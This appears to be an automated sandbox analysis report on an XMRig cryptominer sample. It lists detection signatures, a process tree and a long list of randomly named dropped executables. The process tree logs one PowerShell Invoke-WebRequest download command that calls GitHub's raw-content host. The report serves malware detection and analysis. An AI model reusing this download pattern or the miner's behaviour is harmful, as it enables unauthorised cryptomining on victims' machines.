Malware Analysis Report

2025-04-19 17:00

Sample ID 240522-qk2qaach41
Target 31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe
SHA256 09c7214ef6b503d24aeedec2eacaf72163aed3d270cc0b887983bade874d4f3b
Tags
miner upx xmrig execution
score
10/10

Analysis Overview

score
10/10

SHA256

09c7214ef6b503d24aeedec2eacaf72163aed3d270cc0b887983bade874d4f3b

Threat Level: Known bad

The file 31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

Xmrig family

XMRig Miner payload


Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 13:20

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 13:20

Reported

2024-05-22 13:22

Platform

win7-20240221-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\YXdbYel.exe

C:\Windows\System\lRFcohs.exe

C:\Windows\System\lRFcohs.exe

C:\Windows\System\bOkmWIX.exe

C:\Windows\System\bOkmWIX.exe

C:\Windows\System\nUJaLNr.exe

C:\Windows\System\nUJaLNr.exe

C:\Windows\System\biJubOD.exe

C:\Windows\System\biJubOD.exe

C:\Windows\System\tcrGkRK.exe

C:\Windows\System\tcrGkRK.exe

C:\Windows\System\TgbNwrn.exe

C:\Windows\System\TgbNwrn.exe

C:\Windows\System\YIvuCqy.exe

C:\Windows\System\YIvuCqy.exe

C:\Windows\System\YgpKSvh.exe

C:\Windows\System\YgpKSvh.exe

C:\Windows\System\PTBLrYB.exe

C:\Windows\System\PTBLrYB.exe

C:\Windows\System\WjFNske.exe

C:\Windows\System\WjFNske.exe

C:\Windows\System\wNtplOz.exe

C:\Windows\System\wNtplOz.exe

C:\Windows\System\ruaYKLN.exe

C:\Windows\System\ruaYKLN.exe

C:\Windows\System\jWrsaME.exe

C:\Windows\System\jWrsaME.exe

C:\Windows\System\VQlbBPn.exe

C:\Windows\System\VQlbBPn.exe

C:\Windows\System\GGRMdqs.exe

C:\Windows\System\GGRMdqs.exe

C:\Windows\System\KIfzXHG.exe

C:\Windows\System\KIfzXHG.exe

C:\Windows\System\PesFZuS.exe

C:\Windows\System\PesFZuS.exe

C:\Windows\System\TGgOPUi.exe

C:\Windows\System\TGgOPUi.exe

C:\Windows\System\WrNOlwk.exe

C:\Windows\System\WrNOlwk.exe

C:\Windows\System\vBhZBbB.exe

C:\Windows\System\vBhZBbB.exe

C:\Windows\System\mvlljIf.exe

C:\Windows\System\mvlljIf.exe

C:\Windows\System\dHfdsDe.exe

C:\Windows\System\dHfdsDe.exe

C:\Windows\System\PCHuBab.exe

C:\Windows\System\PCHuBab.exe

C:\Windows\System\vKAUONZ.exe

C:\Windows\System\vKAUONZ.exe

C:\Windows\System\dLIvQjL.exe

C:\Windows\System\dLIvQjL.exe

C:\Windows\System\GFBpIRN.exe

C:\Windows\System\GFBpIRN.exe

C:\Windows\System\JupIKaZ.exe

C:\Windows\System\JupIKaZ.exe

C:\Windows\System\cHXrdEy.exe

C:\Windows\System\cHXrdEy.exe

C:\Windows\System\bjJAGwx.exe

C:\Windows\System\bjJAGwx.exe

C:\Windows\System\INYPEYs.exe

C:\Windows\System\INYPEYs.exe

C:\Windows\System\qNQfQVf.exe

C:\Windows\System\qNQfQVf.exe

C:\Windows\System\NwHqwDF.exe

C:\Windows\System\NwHqwDF.exe

C:\Windows\System\AAyAyTx.exe

C:\Windows\System\AAyAyTx.exe

C:\Windows\System\RicjANV.exe

C:\Windows\System\RicjANV.exe

C:\Windows\System\KSAVQGa.exe

C:\Windows\System\KSAVQGa.exe

C:\Windows\System\bpZbmBl.exe

C:\Windows\System\bpZbmBl.exe

C:\Windows\System\RWckaGu.exe

C:\Windows\System\RWckaGu.exe

C:\Windows\System\MhSCFWz.exe

C:\Windows\System\MhSCFWz.exe

C:\Windows\System\VupwIXr.exe

C:\Windows\System\VupwIXr.exe

C:\Windows\System\FPKgjbv.exe

C:\Windows\System\FPKgjbv.exe

C:\Windows\System\nvxCMhY.exe

C:\Windows\System\nvxCMhY.exe

C:\Windows\System\ctPsxyT.exe

C:\Windows\System\ctPsxyT.exe

C:\Windows\System\EDyviXg.exe

C:\Windows\System\EDyviXg.exe

C:\Windows\System\iEQNaoh.exe

C:\Windows\System\iEQNaoh.exe

C:\Windows\System\LpIFECu.exe

C:\Windows\System\LpIFECu.exe

C:\Windows\System\RVIHvAn.exe

C:\Windows\System\RVIHvAn.exe

C:\Windows\System\kxWVuiT.exe

C:\Windows\System\kxWVuiT.exe

C:\Windows\System\eavsvUL.exe

C:\Windows\System\eavsvUL.exe

C:\Windows\System\uPiZzMP.exe

C:\Windows\System\uPiZzMP.exe

C:\Windows\System\xKHkdrB.exe

C:\Windows\System\xKHkdrB.exe

C:\Windows\System\iGJkyKS.exe

C:\Windows\System\iGJkyKS.exe

C:\Windows\System\MeEcUMg.exe

C:\Windows\System\MeEcUMg.exe

C:\Windows\System\UNbcTQf.exe

C:\Windows\System\UNbcTQf.exe

C:\Windows\System\CJrKJXZ.exe

C:\Windows\System\CJrKJXZ.exe

C:\Windows\System\KaRgVQG.exe

C:\Windows\System\KaRgVQG.exe

C:\Windows\System\IuVfncg.exe

C:\Windows\System\IuVfncg.exe

C:\Windows\System\OiWgyem.exe

C:\Windows\System\OiWgyem.exe

C:\Windows\System\rhTHeFR.exe

C:\Windows\System\rhTHeFR.exe

C:\Windows\System\twGGUJd.exe

C:\Windows\System\twGGUJd.exe

C:\Windows\System\fMEWmrS.exe

C:\Windows\System\fMEWmrS.exe

C:\Windows\System\EKqXcds.exe

C:\Windows\System\EKqXcds.exe

C:\Windows\System\WgGDBta.exe

C:\Windows\System\WgGDBta.exe

C:\Windows\System\UEPbRZS.exe

C:\Windows\System\UEPbRZS.exe

C:\Windows\System\GNVIifC.exe

C:\Windows\System\GNVIifC.exe

C:\Windows\System\HOiUBnO.exe

C:\Windows\System\HOiUBnO.exe

C:\Windows\System\QDMIvlH.exe

C:\Windows\System\QDMIvlH.exe

C:\Windows\System\BuLkmHV.exe

C:\Windows\System\BuLkmHV.exe

C:\Windows\System\YXFOKCj.exe

C:\Windows\System\YXFOKCj.exe

C:\Windows\System\KthRBSm.exe

C:\Windows\System\KthRBSm.exe

C:\Windows\System\OqLYTXs.exe

C:\Windows\System\OqLYTXs.exe

C:\Windows\System\yKKKBhL.exe

C:\Windows\System\yKKKBhL.exe

C:\Windows\System\WHWXoFS.exe

C:\Windows\System\WHWXoFS.exe

C:\Windows\System\EGprnbc.exe

C:\Windows\System\EGprnbc.exe

C:\Windows\System\vJabdJt.exe

C:\Windows\System\vJabdJt.exe

C:\Windows\System\bGKLQbd.exe

C:\Windows\System\bGKLQbd.exe

C:\Windows\System\RsaWCow.exe

C:\Windows\System\RsaWCow.exe

C:\Windows\System\tZmZcQo.exe

C:\Windows\System\tZmZcQo.exe

C:\Windows\System\jWjUmHU.exe

C:\Windows\System\jWjUmHU.exe

C:\Windows\System\JohsOoQ.exe

C:\Windows\System\JohsOoQ.exe

C:\Windows\System\jysyBqO.exe

C:\Windows\System\jysyBqO.exe

C:\Windows\System\DIOwwyp.exe

C:\Windows\System\DIOwwyp.exe

C:\Windows\System\SZwAmlz.exe

C:\Windows\System\SZwAmlz.exe

C:\Windows\System\RlGDvpG.exe

C:\Windows\System\RlGDvpG.exe

C:\Windows\System\MHQBTEM.exe

C:\Windows\System\MHQBTEM.exe

C:\Windows\System\YZmTCJc.exe

C:\Windows\System\YZmTCJc.exe

C:\Windows\System\NRQHguP.exe

C:\Windows\System\NRQHguP.exe

C:\Windows\System\XdvBngS.exe

C:\Windows\System\XdvBngS.exe

C:\Windows\System\CDqpavg.exe

C:\Windows\System\CDqpavg.exe

C:\Windows\System\yzauXdQ.exe

C:\Windows\System\yzauXdQ.exe

C:\Windows\System\xGwgQcj.exe

C:\Windows\System\xGwgQcj.exe

C:\Windows\System\MbwsBlr.exe

C:\Windows\System\MbwsBlr.exe

C:\Windows\System\sZBwkAP.exe

C:\Windows\System\sZBwkAP.exe

C:\Windows\System\LJGCiou.exe

C:\Windows\System\LJGCiou.exe

C:\Windows\System\UYjEUnD.exe

C:\Windows\System\UYjEUnD.exe

C:\Windows\System\zHJtzqF.exe

C:\Windows\System\zHJtzqF.exe

C:\Windows\System\eCRgfeq.exe

C:\Windows\System\eCRgfeq.exe

C:\Windows\System\TjaGZPv.exe

C:\Windows\System\TjaGZPv.exe

C:\Windows\System\oZfcYVu.exe

C:\Windows\System\oZfcYVu.exe

C:\Windows\System\yOSbxLZ.exe

C:\Windows\System\yOSbxLZ.exe

C:\Windows\System\JXpBWkJ.exe

C:\Windows\System\JXpBWkJ.exe

C:\Windows\System\HHIskcx.exe

C:\Windows\System\HHIskcx.exe

C:\Windows\System\IxBkxVQ.exe

C:\Windows\System\IxBkxVQ.exe

C:\Windows\System\yMZMvLm.exe

C:\Windows\System\yMZMvLm.exe

C:\Windows\System\FFTMwgx.exe

C:\Windows\System\FFTMwgx.exe

C:\Windows\System\DmWtEYZ.exe

C:\Windows\System\DmWtEYZ.exe

C:\Windows\System\UvmqjpN.exe

C:\Windows\System\UvmqjpN.exe

C:\Windows\System\riFKTmW.exe

C:\Windows\System\riFKTmW.exe

C:\Windows\System\bJqflBO.exe

C:\Windows\System\bJqflBO.exe

C:\Windows\System\PvAtJln.exe

C:\Windows\System\PvAtJln.exe

C:\Windows\System\afXMwJi.exe

C:\Windows\System\afXMwJi.exe

C:\Windows\System\VdSXxCH.exe

C:\Windows\System\VdSXxCH.exe

C:\Windows\System\OwXoFZa.exe

C:\Windows\System\OwXoFZa.exe

C:\Windows\System\myjpETt.exe

C:\Windows\System\myjpETt.exe

C:\Windows\System\mYcprEk.exe

C:\Windows\System\mYcprEk.exe

C:\Windows\System\iCmUMxQ.exe

C:\Windows\System\iCmUMxQ.exe

C:\Windows\System\CGWVNDb.exe

C:\Windows\System\CGWVNDb.exe

C:\Windows\System\aTPbfOr.exe

C:\Windows\System\aTPbfOr.exe

C:\Windows\System\rlbOXIL.exe

C:\Windows\System\rlbOXIL.exe

C:\Windows\System\Ccjvvnf.exe

C:\Windows\System\Ccjvvnf.exe

C:\Windows\System\JeoMuyU.exe

C:\Windows\System\JeoMuyU.exe

C:\Windows\System\BqFTdsF.exe

C:\Windows\System\BqFTdsF.exe

C:\Windows\System\DewDXNO.exe

C:\Windows\System\DewDXNO.exe

C:\Windows\System\oZveYqi.exe

C:\Windows\System\oZveYqi.exe

C:\Windows\System\qKvLIXp.exe

C:\Windows\System\qKvLIXp.exe

C:\Windows\System\ZbfkPhr.exe

C:\Windows\System\ZbfkPhr.exe

C:\Windows\System\NCLcMuH.exe

C:\Windows\System\NCLcMuH.exe

C:\Windows\System\ScrMycn.exe

C:\Windows\System\ScrMycn.exe

C:\Windows\System\TARPxIC.exe

C:\Windows\System\TARPxIC.exe

C:\Windows\System\HrGNdVc.exe

C:\Windows\System\HrGNdVc.exe

C:\Windows\System\dRUsKhR.exe

C:\Windows\System\dRUsKhR.exe

C:\Windows\System\roNdqrV.exe

C:\Windows\System\roNdqrV.exe

C:\Windows\System\fPYWMwY.exe

C:\Windows\System\fPYWMwY.exe

C:\Windows\System\nOTOMWt.exe

C:\Windows\System\nOTOMWt.exe

C:\Windows\System\fXOwRpg.exe

C:\Windows\System\fXOwRpg.exe

C:\Windows\System\pYvyEtA.exe

C:\Windows\System\pYvyEtA.exe

C:\Windows\System\XbPCEVG.exe

C:\Windows\System\XbPCEVG.exe

C:\Windows\System\MFMunjT.exe

C:\Windows\System\MFMunjT.exe

C:\Windows\System\DsfXbJT.exe

C:\Windows\System\DsfXbJT.exe

C:\Windows\System\jBLIyoH.exe

C:\Windows\System\jBLIyoH.exe

C:\Windows\System\YUZUtyf.exe

C:\Windows\System\YUZUtyf.exe

C:\Windows\System\WajZbCz.exe

C:\Windows\System\WajZbCz.exe

C:\Windows\System\WIoufJp.exe

C:\Windows\System\WIoufJp.exe

C:\Windows\System\OCYZGkh.exe

C:\Windows\System\OCYZGkh.exe

C:\Windows\System\gEjrYEQ.exe

C:\Windows\System\gEjrYEQ.exe

C:\Windows\System\gQiOHzs.exe

C:\Windows\System\gQiOHzs.exe

C:\Windows\System\sRVALmn.exe

C:\Windows\System\sRVALmn.exe

C:\Windows\System\icIikwu.exe

C:\Windows\System\icIikwu.exe

C:\Windows\System\ONxJFGw.exe

C:\Windows\System\ONxJFGw.exe

C:\Windows\System\inVEKxT.exe

C:\Windows\System\inVEKxT.exe

C:\Windows\System\wtXNsqh.exe

C:\Windows\System\wtXNsqh.exe

C:\Windows\System\NIfUlYe.exe

C:\Windows\System\NIfUlYe.exe

C:\Windows\System\dlVdMIJ.exe

C:\Windows\System\dlVdMIJ.exe

C:\Windows\System\PHDQeAe.exe

C:\Windows\System\PHDQeAe.exe

C:\Windows\System\oAbBuRg.exe

C:\Windows\System\oAbBuRg.exe

C:\Windows\System\OKrKezj.exe

C:\Windows\System\OKrKezj.exe

C:\Windows\System\uXqpmJR.exe

C:\Windows\System\uXqpmJR.exe

C:\Windows\System\KwTjUYX.exe

C:\Windows\System\KwTjUYX.exe

C:\Windows\System\iSRMgou.exe

C:\Windows\System\iSRMgou.exe

C:\Windows\System\ZQEgGTr.exe

C:\Windows\System\ZQEgGTr.exe

C:\Windows\System\cCMRwwN.exe

C:\Windows\System\cCMRwwN.exe

C:\Windows\System\UqmVvpt.exe

C:\Windows\System\UqmVvpt.exe

C:\Windows\System\WmYzpMt.exe

C:\Windows\System\WmYzpMt.exe

C:\Windows\System\BwNnMbK.exe

C:\Windows\System\BwNnMbK.exe

C:\Windows\System\llnzORO.exe

C:\Windows\System\llnzORO.exe

C:\Windows\System\MpFXMSX.exe

C:\Windows\System\MpFXMSX.exe

C:\Windows\System\uHXKVhJ.exe

C:\Windows\System\uHXKVhJ.exe

C:\Windows\System\AdMYFQS.exe

C:\Windows\System\AdMYFQS.exe

C:\Windows\System\sgxGDYi.exe

C:\Windows\System\sgxGDYi.exe

C:\Windows\System\WETZUAn.exe

C:\Windows\System\WETZUAn.exe

C:\Windows\System\UTyzimG.exe

C:\Windows\System\UTyzimG.exe

C:\Windows\System\GJkwhkD.exe

C:\Windows\System\GJkwhkD.exe

C:\Windows\System\RizFsAn.exe

C:\Windows\System\RizFsAn.exe

C:\Windows\System\yaREffX.exe

C:\Windows\System\yaREffX.exe

C:\Windows\System\gMlacbC.exe

C:\Windows\System\gMlacbC.exe

C:\Windows\System\TIIGDkM.exe

C:\Windows\System\TIIGDkM.exe

C:\Windows\System\zzzGppY.exe

C:\Windows\System\zzzGppY.exe

C:\Windows\System\dcTygzt.exe

C:\Windows\System\dcTygzt.exe

C:\Windows\System\eSFMndF.exe

C:\Windows\System\eSFMndF.exe

C:\Windows\System\GEQmHNu.exe

C:\Windows\System\GEQmHNu.exe

C:\Windows\System\QBGzUkL.exe

C:\Windows\System\QBGzUkL.exe

C:\Windows\System\AuslQEF.exe

C:\Windows\System\AuslQEF.exe

C:\Windows\System\uHxeweF.exe

C:\Windows\System\uHxeweF.exe

C:\Windows\System\uuDiArZ.exe

C:\Windows\System\uuDiArZ.exe

C:\Windows\System\OaCSDHD.exe

C:\Windows\System\OaCSDHD.exe

C:\Windows\System\RVTFYYd.exe

C:\Windows\System\RVTFYYd.exe

C:\Windows\System\GNVVeEd.exe

C:\Windows\System\GNVVeEd.exe

C:\Windows\System\lgxpyRB.exe

C:\Windows\System\lgxpyRB.exe

C:\Windows\System\bQpsmFR.exe

C:\Windows\System\bQpsmFR.exe

C:\Windows\System\OUpPAYt.exe

C:\Windows\System\OUpPAYt.exe

C:\Windows\System\iAjdkHx.exe

C:\Windows\System\iAjdkHx.exe

C:\Windows\System\xWtVisG.exe

C:\Windows\System\xWtVisG.exe

C:\Windows\System\MgCZjDk.exe

C:\Windows\System\MgCZjDk.exe

C:\Windows\System\lzxORhO.exe

C:\Windows\System\lzxORhO.exe

C:\Windows\System\xIYFqYO.exe

C:\Windows\System\xIYFqYO.exe

C:\Windows\System\BEMIXDA.exe

C:\Windows\System\BEMIXDA.exe

C:\Windows\System\XVRmNzJ.exe

C:\Windows\System\XVRmNzJ.exe

C:\Windows\System\ccmGJxO.exe

C:\Windows\System\ccmGJxO.exe

C:\Windows\System\dLnEOTa.exe

C:\Windows\System\dLnEOTa.exe

C:\Windows\System\XZPCaLe.exe

C:\Windows\System\XZPCaLe.exe

C:\Windows\System\EAZEFhQ.exe

C:\Windows\System\EAZEFhQ.exe

C:\Windows\System\RWumbsv.exe

C:\Windows\System\RWumbsv.exe

C:\Windows\System\XkBkDID.exe

C:\Windows\System\XkBkDID.exe

C:\Windows\System\RWtOxrX.exe

C:\Windows\System\RWtOxrX.exe

C:\Windows\System\ukfOEVX.exe

C:\Windows\System\ukfOEVX.exe

C:\Windows\System\fILnkkk.exe

C:\Windows\System\fILnkkk.exe

C:\Windows\System\bxPojjT.exe

C:\Windows\System\bxPojjT.exe

C:\Windows\System\duZauUK.exe

C:\Windows\System\duZauUK.exe

C:\Windows\System\kAZaIue.exe

C:\Windows\System\kAZaIue.exe

C:\Windows\System\LUpJNhA.exe

C:\Windows\System\LUpJNhA.exe

C:\Windows\System\aeHSOJC.exe

C:\Windows\System\aeHSOJC.exe

C:\Windows\System\IMqkOjE.exe

C:\Windows\System\IMqkOjE.exe

C:\Windows\System\SRlhCZg.exe

C:\Windows\System\SRlhCZg.exe

C:\Windows\System\ozMXAQt.exe

C:\Windows\System\ozMXAQt.exe

C:\Windows\System\jVtDAGo.exe

C:\Windows\System\jVtDAGo.exe

C:\Windows\System\NJoHGZa.exe

C:\Windows\System\NJoHGZa.exe

C:\Windows\System\EtEnYRB.exe

C:\Windows\System\EtEnYRB.exe

C:\Windows\System\jBaDtAg.exe

C:\Windows\System\jBaDtAg.exe

C:\Windows\System\rTjwqCb.exe

C:\Windows\System\rTjwqCb.exe

C:\Windows\System\DZvGEkd.exe

C:\Windows\System\DZvGEkd.exe

C:\Windows\System\uUhWvsr.exe

C:\Windows\System\uUhWvsr.exe

C:\Windows\System\hwdFTua.exe

C:\Windows\System\hwdFTua.exe

C:\Windows\System\RwyRvWa.exe

C:\Windows\System\RwyRvWa.exe

C:\Windows\System\NkOjDOt.exe

C:\Windows\System\NkOjDOt.exe

C:\Windows\System\QzHHSpH.exe

C:\Windows\System\QzHHSpH.exe

C:\Windows\System\efXQVPo.exe

C:\Windows\System\efXQVPo.exe

C:\Windows\System\QDdAoHL.exe

C:\Windows\System\QDdAoHL.exe

C:\Windows\System\lSYZcvD.exe

C:\Windows\System\lSYZcvD.exe

C:\Windows\System\qNbxBaw.exe

C:\Windows\System\qNbxBaw.exe

C:\Windows\System\kIPPpeY.exe

C:\Windows\System\kIPPpeY.exe

C:\Windows\System\lRXoxHb.exe

C:\Windows\System\lRXoxHb.exe

C:\Windows\System\keGQraa.exe

C:\Windows\System\keGQraa.exe

C:\Windows\System\KHTfzod.exe

C:\Windows\System\KHTfzod.exe

C:\Windows\System\tpmtkFt.exe

C:\Windows\System\tpmtkFt.exe

C:\Windows\System\oDaGrDO.exe

C:\Windows\System\oDaGrDO.exe

C:\Windows\System\ZiRHlhW.exe

C:\Windows\System\ZiRHlhW.exe

C:\Windows\System\JByLbTS.exe

C:\Windows\System\JByLbTS.exe

C:\Windows\System\YretadC.exe

C:\Windows\System\YretadC.exe

C:\Windows\System\UhqcoGu.exe

C:\Windows\System\UhqcoGu.exe

C:\Windows\System\apAllny.exe

C:\Windows\System\apAllny.exe

C:\Windows\System\mXhiqEF.exe

C:\Windows\System\mXhiqEF.exe

C:\Windows\System\MNVfkfd.exe

C:\Windows\System\MNVfkfd.exe

C:\Windows\System\WeDGEsV.exe

C:\Windows\System\WeDGEsV.exe

C:\Windows\System\ZLvjYDR.exe

C:\Windows\System\ZLvjYDR.exe

C:\Windows\System\pLVlPhw.exe

C:\Windows\System\pLVlPhw.exe

C:\Windows\System\BSiBGwm.exe

C:\Windows\System\BSiBGwm.exe

C:\Windows\System\nYWiOuk.exe

C:\Windows\System\nYWiOuk.exe

C:\Windows\System\RoKmmMk.exe

C:\Windows\System\RoKmmMk.exe

C:\Windows\System\CYOfaHw.exe

C:\Windows\System\CYOfaHw.exe

C:\Windows\System\DHgMTBF.exe

C:\Windows\System\DHgMTBF.exe

C:\Windows\System\YNQKibc.exe

C:\Windows\System\YNQKibc.exe

C:\Windows\System\LYrvdEv.exe

C:\Windows\System\LYrvdEv.exe

C:\Windows\System\KwuCjUW.exe

C:\Windows\System\KwuCjUW.exe

C:\Windows\System\evDVyWZ.exe

C:\Windows\System\evDVyWZ.exe

C:\Windows\System\AxVRfNb.exe

C:\Windows\System\AxVRfNb.exe

C:\Windows\System\CwjaqtJ.exe

C:\Windows\System\CwjaqtJ.exe

C:\Windows\System\VqPoFOW.exe

C:\Windows\System\VqPoFOW.exe

C:\Windows\System\EaCrxCV.exe

C:\Windows\System\EaCrxCV.exe

C:\Windows\System\pIxdMOt.exe

C:\Windows\System\pIxdMOt.exe

C:\Windows\System\SxEROSa.exe

C:\Windows\System\SxEROSa.exe

C:\Windows\System\xfpKiXL.exe

C:\Windows\System\xfpKiXL.exe

C:\Windows\System\UEyrbjV.exe

C:\Windows\System\UEyrbjV.exe

C:\Windows\System\dOrwEvM.exe

C:\Windows\System\dOrwEvM.exe

C:\Windows\System\eUiiIZl.exe

C:\Windows\System\eUiiIZl.exe

C:\Windows\System\gOsLcgN.exe

C:\Windows\System\gOsLcgN.exe

C:\Windows\System\LPCRXaI.exe

C:\Windows\System\LPCRXaI.exe

C:\Windows\System\ztcgdOq.exe

C:\Windows\System\ztcgdOq.exe

C:\Windows\System\IHonNaO.exe

C:\Windows\System\IHonNaO.exe

C:\Windows\System\kXfNymo.exe

C:\Windows\System\kXfNymo.exe

C:\Windows\System\TDBTGlo.exe

C:\Windows\System\TDBTGlo.exe

C:\Windows\System\ilpZTHm.exe

C:\Windows\System\ilpZTHm.exe

C:\Windows\System\lyxXCts.exe

C:\Windows\System\lyxXCts.exe

C:\Windows\System\DMtfXim.exe

C:\Windows\System\DMtfXim.exe

C:\Windows\System\Qbfkbxs.exe

C:\Windows\System\Qbfkbxs.exe

C:\Windows\System\MVJHqUv.exe

C:\Windows\System\MVJHqUv.exe

C:\Windows\System\NNNjZcF.exe

C:\Windows\System\NNNjZcF.exe

C:\Windows\System\rdDRwNt.exe

C:\Windows\System\rdDRwNt.exe

C:\Windows\System\ZogoDuJ.exe

C:\Windows\System\ZogoDuJ.exe

C:\Windows\System\JAZdjtH.exe

C:\Windows\System\JAZdjtH.exe

C:\Windows\System\yCBGvmb.exe

C:\Windows\System\yCBGvmb.exe

C:\Windows\System\CJUnBNs.exe

C:\Windows\System\CJUnBNs.exe

C:\Windows\System\YKMBsFa.exe

C:\Windows\System\YKMBsFa.exe

C:\Windows\System\yTwuTis.exe

C:\Windows\System\yTwuTis.exe

C:\Windows\System\pmskIpf.exe

C:\Windows\System\pmskIpf.exe

C:\Windows\System\vMzvRba.exe

C:\Windows\System\vMzvRba.exe

C:\Windows\System\jhMGAMj.exe

C:\Windows\System\jhMGAMj.exe

C:\Windows\System\SpCiWNP.exe

C:\Windows\System\SpCiWNP.exe

C:\Windows\System\TrzipOc.exe

C:\Windows\System\TrzipOc.exe

C:\Windows\System\BJWAKas.exe

C:\Windows\System\BJWAKas.exe

C:\Windows\System\uYAbCzr.exe

C:\Windows\System\uYAbCzr.exe

C:\Windows\System\SmajNkM.exe

C:\Windows\System\SmajNkM.exe

C:\Windows\System\MBgtSFy.exe

C:\Windows\System\MBgtSFy.exe

C:\Windows\System\owWTIQS.exe

C:\Windows\System\owWTIQS.exe

C:\Windows\System\wkleMGf.exe

C:\Windows\System\wkleMGf.exe

C:\Windows\System\GWKCMdh.exe

C:\Windows\System\GWKCMdh.exe

C:\Windows\System\CdasRtH.exe

C:\Windows\System\CdasRtH.exe

C:\Windows\System\gMapEaL.exe

C:\Windows\System\gMapEaL.exe

C:\Windows\System\TtjUvQE.exe

C:\Windows\System\TtjUvQE.exe

C:\Windows\System\jcDDubM.exe

C:\Windows\System\jcDDubM.exe

C:\Windows\System\DgqNeVI.exe

C:\Windows\System\DgqNeVI.exe

C:\Windows\System\zIzStcV.exe

C:\Windows\System\zIzStcV.exe

C:\Windows\System\HcEEMBT.exe

C:\Windows\System\HcEEMBT.exe

C:\Windows\System\hQRJoqr.exe

C:\Windows\System\hQRJoqr.exe

C:\Windows\System\nDnEqDs.exe

C:\Windows\System\nDnEqDs.exe

C:\Windows\System\qQqsZmE.exe

C:\Windows\System\qQqsZmE.exe

C:\Windows\System\yiPEIFB.exe

C:\Windows\System\yiPEIFB.exe

C:\Windows\System\pLKZHqX.exe

C:\Windows\System\pLKZHqX.exe

C:\Windows\System\UiqumYs.exe

C:\Windows\System\UiqumYs.exe

C:\Windows\System\bYrAeYF.exe

C:\Windows\System\bYrAeYF.exe

C:\Windows\System\usUfbsW.exe

C:\Windows\System\usUfbsW.exe

C:\Windows\System\hlCqnrA.exe

C:\Windows\System\hlCqnrA.exe

C:\Windows\System\dsQhKPn.exe

C:\Windows\System\dsQhKPn.exe

C:\Windows\System\HsizOqQ.exe

C:\Windows\System\HsizOqQ.exe

C:\Windows\System\vMjLRGu.exe

C:\Windows\System\vMjLRGu.exe

C:\Windows\System\TGTsIIh.exe

C:\Windows\System\TGTsIIh.exe

C:\Windows\System\gJCKKmk.exe

C:\Windows\System\gJCKKmk.exe

C:\Windows\System\SHhLQor.exe

C:\Windows\System\SHhLQor.exe

C:\Windows\System\DLGkarw.exe

C:\Windows\System\DLGkarw.exe

C:\Windows\System\MiOCBte.exe

C:\Windows\System\MiOCBte.exe

C:\Windows\System\hpSLRTo.exe

C:\Windows\System\hpSLRTo.exe

C:\Windows\System\hsVWCYO.exe

C:\Windows\System\hsVWCYO.exe

C:\Windows\System\lVigVxR.exe

C:\Windows\System\lVigVxR.exe

C:\Windows\System\gBfrjbT.exe

C:\Windows\System\gBfrjbT.exe

C:\Windows\System\THNEXIu.exe

C:\Windows\System\THNEXIu.exe

C:\Windows\System\kgjmjox.exe

C:\Windows\System\kgjmjox.exe

C:\Windows\System\ERyPecg.exe

C:\Windows\System\ERyPecg.exe

C:\Windows\System\zgNslcD.exe

C:\Windows\System\zgNslcD.exe

C:\Windows\System\KLEmSlo.exe

C:\Windows\System\KLEmSlo.exe

C:\Windows\System\MVTVIGw.exe

C:\Windows\System\MVTVIGw.exe

C:\Windows\System\YLRBiVd.exe

C:\Windows\System\YLRBiVd.exe

C:\Windows\System\KPPiBwY.exe

C:\Windows\System\KPPiBwY.exe

C:\Windows\System\yNTCMbL.exe

C:\Windows\System\yNTCMbL.exe

C:\Windows\System\ZKefULZ.exe

C:\Windows\System\ZKefULZ.exe

C:\Windows\System\nfnpalq.exe

C:\Windows\System\nfnpalq.exe

C:\Windows\System\akFnXYF.exe

C:\Windows\System\akFnXYF.exe

C:\Windows\System\fcjQRYT.exe

C:\Windows\System\fcjQRYT.exe

C:\Windows\System\ayBmPCQ.exe

C:\Windows\System\ayBmPCQ.exe

C:\Windows\System\uJoLsVR.exe

C:\Windows\System\uJoLsVR.exe

C:\Windows\System\RgQlwKW.exe

C:\Windows\System\RgQlwKW.exe

C:\Windows\System\SvZReZl.exe

C:\Windows\System\SvZReZl.exe

C:\Windows\System\KYgpgyz.exe

C:\Windows\System\KYgpgyz.exe

C:\Windows\System\CutrIDA.exe

C:\Windows\System\CutrIDA.exe

C:\Windows\System\USczSMP.exe

C:\Windows\System\USczSMP.exe

